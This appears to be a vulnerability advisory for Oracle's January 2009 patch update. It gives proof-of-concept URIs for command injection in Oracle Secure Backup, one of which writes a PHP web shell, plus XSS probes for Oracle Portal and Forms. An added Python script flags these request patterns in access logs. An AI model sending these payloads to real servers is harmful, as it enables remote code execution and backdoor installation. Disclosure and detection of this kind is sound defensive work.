Oracle January 2009 Critical Patch Update Multiple Vulnerabilities
Some of these issues may not require specific exploit code and may be trivial to exploit.

Core Security Technologies has developed working commercial exploits for its CORE IMPACT product for the issues documented by CVE-2008-5449 and CVE-2008-5457. These exploits are not otherwise publicly available or known to be circulating in the wild.

The following proof-of-concept URIs are available for Oracle Secure Backup:

1. Create a file in the directory "c:\":
https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.txt+;

2. Create a PHP backdoor:
https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+%22%3C%3Fphp+print(shell_exec(%24_GET%5B'a'%5D))%3B+%3F%3E%22+%3E+test.php%3B%26%26+echo

The following example URI is available for the Oracle Application Server portal:
http://www.example.com/sso/jsp/login.jsp?site2pstoretoken=XSS PORTAL&search_type=XSS

The following example URI is available for Oracle Forms:
http://www.example.com/ifcgi60.exe?form=XSS

The following exploits and proof of concept are available:
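To check web server access logs for requests shaped like the example URIs on this page, the following Python script is an added example, not part of the original advisory or any vendor tooling. The combined log format, the sample lines and the matching heuristics are assumptions of this example; the endpoint and parameter names are the ones shown in the URIs above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint -> query parameters, taken from the example URIs on this page.
WATCHED = {
    "/login.php": ["rbtool"],
    "/sso/jsp/login.jsp": ["site2pstoretoken", "search_type"],
    "/ifcgi60.exe": ["form"],
}
# Heuristic (assumption): a watched parameter should never carry
# command-shell syntax or HTML/script markup once URL-decoded.
SUSPICIOUS = re.compile(r"""cmd\.exe|\$\(|[;&|<>`"']""", re.I)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jan/2009:10:01:02 +0000] "GET /login.php?clear=no&button=Logout&rbtool=cmd.exe+/c+echo+hello+world HTTP/1.1" 200 512',
    '192.0.2.11 - - [14/Jan/2009:10:01:05 +0000] "GET /login.php?clear=no&button=Logout HTTP/1.1" 200 498',
    '192.0.2.12 - - [14/Jan/2009:10:02:41 +0000] "GET /sso/jsp/login.jsp?site2pstoretoken=v1.2&search_type=%3Cb%3Ex%3C/b%3E HTTP/1.1" 200 2310',
    '192.0.2.13 - - [14/Jan/2009:10:03:17 +0000] "GET /ifcgi60.exe?form=orders.fmx HTTP/1.1" 200 8120',
]

def flag_requests(log_lines):
    """Return (line_number, path, parameter, decoded_value) for each hit."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group(1))
        params = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
        for name in WATCHED.get(url.path.lower(), []):
            for value in params.get(name, []):
                if SUSPICIOUS.search(value):
                    hits.append((n, url.path, name, value))
    return hits

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

Hits are leads for review rather than proof of compromise; the pattern should be tuned against the values these parameters normally carry in the deployment being examined.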